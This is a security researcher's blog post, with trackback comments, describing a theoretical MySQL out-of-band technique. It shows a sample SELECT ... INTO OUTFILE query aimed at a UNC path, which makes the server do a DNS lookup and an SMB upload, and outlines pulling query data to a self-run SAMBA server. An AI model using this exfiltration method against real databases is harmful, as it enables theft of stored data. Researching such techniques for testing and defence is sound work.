MySQL Out-Of-Band (OOB)

Both me and my fellow researcher Mathias have heard all from "It's impossible to make DNS requests in MySQL" to "There is no out-of-band techniques for MySQL".
So we both thought "Hey, it can't be that hard..."

So ladies and gentlemen, here's a (so far) theory on a MySQL out-of-band request.

As long as you have the File_priv set to Y in MySQL it is a possible scenario.

So let's start off with DNS requests.
Right. A few posts ago i published this, an article on how to perform SMB (NetBIOS) uploads/dumps from a MySQL database.

And well, if you for example write:

SELECT 'Hello world.' INTO OUTFILE '\\\\www.google.com\\?save_here.txt'

The operating system will look up the address of where www.google.com is located.
And guess what method it is using?
That's right. DNS.
We did try it against Google's DNS server at 8.8.8.8, so no internal server(s) or anything.

However you're not able to upload (?) data by putting a column or whatever as a sub-domain to let's say google.com.
As the classical PostgreSQL and Oracle scenarios.

But if there is an open NetBIOS/SAMBA server on the specific IP(s) the DNS-request pointed out, you're able to upload the information there.

That's right, that is the Out-Of-Band method.

So how to perform it?

  1. Write a custom (possibly malicious) SAMBA-server.
  2. Request the data of your choice to '\\\\IP\\filename' or '\\\\DNS\\filename' from MySQL.
  3. Watch the data being uploaded to your own homemade server.

If we wasn't out of coffee now at 1am, we would have coded this server for you...
But meh, some other day perhaps.

Hey, I'm Fredrik. I'm from Sweden, born 1990, and I got a huge interest for information technology and information security. So far, I've been studying for three years at the Internation IT College of Sweden and one year at the Royal Institute of Technology (Kista, Sweden). I'm one of the Co-Founders of Detectify. I'm working closely together with the swedish firm Young & Skilled. ...Not to forget, I'm the previous founder of Arctic Security. If you wish to contact me, please email me at h@ackack.net or follow me on twitter @Almroot.

7 Comments

  1. Tweets that mention MySQL Out-Of-Band (OOB) -- Topsy.com says:

    [...] This post was mentioned on Twitter by AckAck, AckAck. AckAck said: New Post: MySQL Out-Of-Band (OOB) ( http://cli.gs/19hEX ): Both me and my fellow research... [...]

  2. MySQL Out-Of-Band (OOB) | Source code bank says:

    [...] post: MySQL Out-Of-Band (OOB) If you enjoyed this article please consider sharing [...]

  3. Jelmer de Hen says:

    ARP packets can also be generated by requesting to a non-existing ip

  4. Ack Ack – Interesting security blog | Ascii for Breakfast says:

    [...] && exploits. I especially love the article about performing DNS queries through MySQL (theory), the very funny RAM exhaustion when calling infinite mail client processes and the discovered [...]

  5. New fast OOB CPU saving MySQL injection technique to replace benchmark in blind MySQL injections says:

    [...] PostgreSQL « MySQL Out-Of-Band (OOB) [...]

  6. MySQL – Fun in intranets! says:

    [...] MySQL OOB technique, seem to be getting out of control. It didn’t exist in the wild (for as far as we [...]

  7. Jelmer de Hen says:

    A follow up can be found here http://h.ackack.net/?p=397

Leave a Comment